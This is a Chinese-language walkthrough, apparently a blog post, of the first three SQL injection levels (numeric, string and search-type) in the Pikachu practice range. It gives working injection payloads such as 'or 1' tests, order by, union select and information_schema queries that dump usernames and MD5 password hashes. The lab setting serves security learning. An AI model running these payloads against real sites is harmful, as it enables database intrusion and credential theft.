pikachu靶场之SQL注入(1-3)

pikachu靶场之SQL注入(1-3)

1.数字型注入

看题目知道了第一题是数字型注入,下拉框选择,抓个包试试,看来是post,这里我用的是burp。

pikachu靶场之SQL注入(1-3)

方便测试,放到repeater里面。

先试一试出列表1 or 1 --+,出结果了。

pikachu靶场之SQL注入(1-3)

order by试出来了是2,然后是union select看回显。

pikachu靶场之SQL注入(1-3)

然后按流程来,查库,查表,查字段。

select group_concat(schema_name) from information_schema.schemata
select group_concat(table_name) from information_schema.tables where table_schema='pikachu'
select group_concat(column_name) from information_schema.columns where table_name='users'
select group_concat(username) from pikachu.users
select group_concat(password) from pikachu.users

pikachu靶场之SQL注入(1-3)
pikachu靶场之SQL注入(1-3)

发现密码是md5加密的,直接上cmd5查就好啦。
pikachu靶场之SQL注入(1-3)

2.字符型注入

首先试了1',发现报错信息了。然后1' or 1 #,发现出结果了。
pikachu靶场之SQL注入(1-3)

后面和第一个数值型一样了,先order by,然后union select,然后查库、查表、查字段、查值。

这里就不赘述了。

pikachu靶场之SQL注入(1-3)

3.搜索型注入

先试了a',报错了,然后是a' or 1#,出结果了。

然后又和上面一样了,a' union select (select group_concat(column_name) from information_schema.columns where table_name='users'),(select group_concat(username) from pikachu.users),(select group_concat(password) from pikachu.users)#这里不说了。放一张结果图吧。

pikachu靶场之SQL注入(1-3)

上一篇:pikachu之xss漏洞


下一篇:pikachu 靶场搭建(完整版)